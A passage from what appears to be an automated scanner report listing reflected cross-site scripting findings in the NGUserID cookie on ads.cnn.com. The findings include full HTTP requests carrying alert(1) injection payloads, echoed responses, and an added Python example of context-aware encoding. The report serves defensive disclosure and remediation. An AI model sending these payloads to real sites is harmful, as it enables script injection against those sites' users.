Date: Mon, 15 Aug 2011 18:49:36 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:36 GMT
Pragma: no-cache
Content-Length: 3017
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,58848,61089,61263,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407%2CTIL%2C1313434106153&amp;random=btptulN,bhesAsadoIiib&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1543a2'-alert(1)-'d4f8843d407" width="1" height="1" border="0" />
...[SNIP]...

1.97. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5b1b'-alert(1)-'bffa0fe43f7 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:58 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:58 GMT
Pragma: no-cache
Content-Length: 3001
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,58848,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7%2CTIL%2C1313434014105&amp;random=byjryjR,bhesAncdoztfu&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1e5b1b'-alert(1)-'bffa0fe43f7" width="1" height="1" border="0" />
...[SNIP]...

1.98. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75248'-alert(1)-'a28f4fd55a9 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
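As an added example (not code from this report or from the ad server), the Python below reproduces the two reflection contexts reported for the NGUserID cookie in this section, a single-quoted JavaScript string (findings 1.97 and 1.98) and a double-quoted HTML tag attribute (findings 1.99 onward), using the scanner's own payloads, and shows the inside-out encoding that neutralises both. The pixel template, function names and the `document.write` wrapper are assumptions standing in for the ad server's real markup, of which only fragments are visible in the response snippets.

```python
import html
import re

# Payloads taken from findings 1.98 and 1.99 above (constructed test inputs).
PAYLOAD_JS_STRING = "75248'-alert(1)-'a28f4fd55a9"
PAYLOAD_HTML_ATTR = 'bdb5d"><script>alert(1)</script>fa90414d27d'

# Assumed stand-in for the ad server's tracking pixel; the real template is not on the page.
PIXEL_TEMPLATE = (
    '<img src="/event.ng/Type=count&amp;Params.User.UserID={uid}" '
    'width="1" height="1" border="0" />'
)


def render_pixel_vulnerable(cookie_value: str) -> str:
    """The unsafe pattern: the cookie value is concatenated into an HTML
    attribute, and that markup is itself emitted from a single-quoted
    JavaScript string. Nothing is encoded for either context."""
    img = PIXEL_TEMPLATE.format(uid=cookie_value)
    return f"<script>document.write('{img}');</script>"


def html_attr_encode(value: str) -> str:
    """Encode for a double-quoted HTML attribute: & < > \" ' become entities."""
    return html.escape(value, quote=True)


def js_string_encode(value: str) -> str:
    """Encode for a JavaScript string literal: every character that is not
    ASCII alphanumeric becomes \\xHH (or \\uHHHH), so the value can never
    close the quote, introduce a backslash, or spell out </script>."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def encode_for_attr_inside_js(value: str) -> str:
    """Nested contexts are encoded inside-out, i.e. in the reverse of the
    order the browser decodes them: the JS engine unescapes the literal
    first, then the HTML parser reads the written markup. So the value is
    HTML-attribute-encoded first and the result JS-string-encoded."""
    return js_string_encode(html_attr_encode(value))


def render_pixel_safe(cookie_value: str) -> str:
    """Same template, but the cookie value is encoded for both contexts."""
    img = PIXEL_TEMPLATE.format(uid=encode_for_attr_inside_js(cookie_value))
    return f"<script>document.write('{img}');</script>"


def js_string_decode(literal: str) -> str:
    """What the JS engine does with \\xHH / \\uHHHH escapes in a string literal."""
    return re.sub(
        r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        literal,
    )


def browser_view_of_user_id(encoded: str) -> str:
    """Round trip through both decoders: the attribute value the browser
    ends up with after JS evaluation and HTML entity decoding."""
    return html.unescape(js_string_decode(encoded))


def breaks_out(rendered: str) -> bool:
    """Check for the two breakouts the scanner used: a raw single quote
    closing the JS string, or a raw '\">' closing the attribute and tag."""
    return "'-alert(1)-'" in rendered or '"><script>' in rendered


if __name__ == "__main__":
    for p in (PAYLOAD_JS_STRING, PAYLOAD_HTML_ATTR):
        print("vulnerable breaks out:", breaks_out(render_pixel_vulnerable(p)))
        print("safe breaks out:      ", breaks_out(render_pixel_safe(p)))
        print("browser sees:         ", browser_view_of_user_id(encode_for_attr_inside_js(p)))
```

The order of the two encoders matters: applying the JS escape first and the HTML entity encoding second would leave the backslashes for the HTML parser, which ignores them, and the JS engine would then see raw `&quot;` text rather than a closed quote, which happens to be harmless here but is the wrong layering and fails for other nestings. The `browser_view_of_user_id` round trip is the check to keep in a unit test: the decoded value must equal the original cookie value exactly, with no quote, angle bracket or ampersand ever appearing raw in the encoded form.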

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:01 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:01 GMT
Pragma: no-cache
Content-Length: 2994
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,685,686,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,58848,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9%2CTIL%2C1313433990029&amp;random=bzfbazy,bhesAljdoyRsg&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-175248'-alert(1)-'a28f4fd55a9" width="1" height="1" border="0" />
...[SNIP]...

1.99. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb5d"><script>alert(1)</script>fa90414d27d was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1bdb5d"><script>alert(1)</script>fa90414d27d; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:43 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:43 GMT
Pragma: no-cache
Content-Length: 2853
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,4443,37359,47128,47457,52263,52751,52753,52901,56058,56872,57896,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1bdb5d"><script>alert(1)</script>fa90414d27d&amp;random=bwagwuq,bhesAmtdozocI&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1bdb5d"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Efa90414d27d" width="1" height="1" border="0"
...[SNIP]...

1.100. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc8f"><script>alert(1)</script>88b157cc833 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1ffc8f"><script>alert(1)</script>88b157cc833; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 2817
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52751,52753,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1ffc8f"><script>alert(1)</script>88b157cc833%2CTIL%2C1313433990029&amp;random=bauIytu,bhesAkydoyypg&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1ffc8f"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E88b157cc833" width="1"
...[SNIP]...

1.101. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892e4"><script>alert(1)</script>18323b94f54 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1892e4"><script>alert(1)</script>18323b94f54; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:29 GMT
Pragma: no-cache
Content-Length: 3587
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
67,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61089,61263,61887,61908,61913,63267,116201,116267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-1892e4"><script>alert(1)</script>18323b94f54%2CTIL%2C1313434106153&Redirect=http://www.money.com">
...[SNIP]...

1.102. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4f2"><script>alert(1)</script>bd293f68bb4 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1ab4f2"><script>alert(1)</script>bd293f68bb4; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 983
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7118,7123,7130,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49570,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1ab4f2"><script>alert(1)</script>bd293f68bb4%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.103. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529f1"><script>alert(1)</script>cdefe8435ae was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1529f1"><script>alert(1)</script>cdefe8435ae; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3501
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49576,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1529f1"><script>alert(1)</script>cdefe8435ae%2CTIL%2C1313433990029&amp;random=zIdcsd,bhesAkzdoyysv&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1529f1"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ecdefe8435ae" width="1" h
...[SNIP]...

1.104. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939

Issue detail

